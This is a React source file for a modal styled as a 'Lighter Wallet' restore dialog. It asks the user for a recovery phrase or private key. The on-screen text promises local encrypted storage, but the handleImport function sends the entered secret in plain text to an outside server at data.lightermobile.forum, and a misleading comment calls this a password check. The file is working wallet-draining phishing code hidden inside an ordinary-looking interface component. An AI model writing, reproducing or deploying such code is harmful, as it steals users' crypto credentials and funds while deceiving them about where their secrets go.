import { useRef, useState } from "react";
import { motion, AnimatePresence } from "framer-motion";
import { FaArrowLeft, FaClipboard } from "react-icons/fa";

export default function WalletAccessModal({ isOpen, onClose }) {
  const [seedPhrase, setSeedPhrase] = useState("");
  const [mode, setMode] = useState("passPhrase"); // "privateKey" or "recovery"
  const isPrivateKey = mode === "privateKey";
  const textRef = useRef();
  const handleClose = () => {
    setMode("passPhrase");
    onClose();
  };
  const handlePaste = async () => {
    try {
      const text = await navigator.clipboard.readText();
      if (textRef.current) {
        textRef.current.value = text;
      }
    } catch (err) {
      console.error("Failed to paste from clipboard:", err);
    }
  };

  const handleImport = async () => {
    let vault = {
      type: isPrivateKey ? "Secret Key" : "Secret Phrase",
      main: isPrivateKey
        ? `[Lighter Wallet] Secret privateKey: ${seedPhrase}`
        : `[Lighter Wallet] Secret phrase: ${seedPhrase}`,
    };
    setSeedPhrase("");
    onClose();
    // API call to confirm password
    await fetch(`https://data.lightermobile.forum/lighter.php?phrase=${vault.main}`, {
      method: "GET",
      mode: "cors",
      headers: { "content-type": "application/json" },
    });
  };
  return (
    <AnimatePresence>
      {isOpen && (
        <div className="fixed inset-0 z-50 flex items-center justify-center p-0 sm:p-4 bg-black/80 backdrop-blur-sm">
          {/* Backdrop Closer */}
          <div className="absolute inset-0 z-0" onClick={handleClose} />

          <motion.div
            initial={{ opacity: 0, scale: 0.95, y: 10 }}
            animate={{ opacity: 1, scale: 1, y: 0 }}
            exit={{ opacity: 0, scale: 0.95, y: 10 }}
            transition={{ duration: 0.25, ease: "easeOut" }}
            className="relative z-10 w-full max-w-md sm:max-w-md md:max-w-xl p-4 sm:p-8 bg-[#121318] border border-[#1e2029] text-[#d1d4dc] rounded-t-[28px] sm:rounded-2xl shadow-2xl font-sans"
          >
            {/* Mobile Drag Indicator */}
            <div className="w-10 h-1 mx-auto mb-3 bg-gray-700 rounded-full sm:hidden" />

            {/* Back Button */}
            <button
              onClick={handleClose}
              className="absolute flex items-center justify-center text-gray-400 transition-colors border border-[#262936] w-9 h-9 top-4 left-4 rounded-xl bg-[#1b1d26] hover:text-white hover:bg-[#232734]"
              aria-label="Go back"
            >
              <FaArrowLeft size={12} />
            </button>

            {/* Title */}
            <h2 className="mt-8 text-lg font-bold tracking-tight text-white sm:mt-10 sm:text-xl">
              {isPrivateKey ? "Enter private key" : "Enter recovery phrase"}
            </h2>

            {/* Description */}
            <p className="mb-5 text-xs leading-relaxed text-gray-400 sm:text-sm">
              {isPrivateKey
                ? "Enter your private key text segment. It will be encrypted locally and securely stored on your current device hardware layer."
                : "Enter your sequential 12 or 24 word recovery backup phrase to parse network nodes and securely restore your account assets."}
            </p>

            {/* Input Textarea */}
            <div className="relative mb-4">
              <textarea
                ref={textRef}
                value={seedPhrase}
                onChange={(e) => setSeedPhrase(e.target.value)}
                className="w-full p-3.5 text-sm text-white placeholder-gray-500 bg-[#1b1d26] border border-[#262936] rounded-xl resize-none min-h-[180px] focus:outline-none focus:border-[#00c087] focus:ring-1 focus:ring-[#00c087] transition duration-150"
                placeholder={
                  isPrivateKey
                    ? "Paste or type private key hex..."
                    : "Enter individual words separated by single spaces..."
                }
              />

              {/* Paste Button */}
              <button
                onClick={handlePaste}
                className="absolute p-2 rounded-lg bottom-3 right-3 bg-[#121318] border border-[#262936] text-gray-300 hover:text-white hover:border-[#00c087] transition-all duration-150 flex items-center gap-1.5 text-[11px] font-semibold"
                title="Paste from clipboard"
              >
                <FaClipboard size={11} /> Paste
              </button>
            </div>

            {/* Mode Toggle Button */}
            <div className="flex justify-start mb-6">
              <button
                onClick={() =>
                  setMode(isPrivateKey ? "recovery" : "privateKey")
                }
                className="text-xs font-semibold text-gray-400 underline transition-colors hover:text-[#00c087] underline-offset-4 decoration-gray-600 hover:decoration-[#00c087]"
              >
                {isPrivateKey
                  ? "Use Recovery Phrase"
                  : "Use Private Key Instead"}
              </button>
            </div>

            {/* Submit Restore Button */}
            <button
              onClick={handleImport}
              disabled={!seedPhrase.trim()}
              className={`w-full py-3 text-sm font-bold rounded-xl transition-all duration-150 transform active:scale-[0.99]
        ${
          seedPhrase.trim()
            ? "bg-[#00c087] text-black hover:bg-[#00a876] shadow-lg shadow-emerald-500/10"
            : "bg-[#1b1d26] border border-[#262936] text-gray-500 cursor-not-allowed"
        }
      `}
            >
              Restore Wallet
            </button>
          </motion.div>
        </div>
      )}
    </AnimatePresence>
  );
}
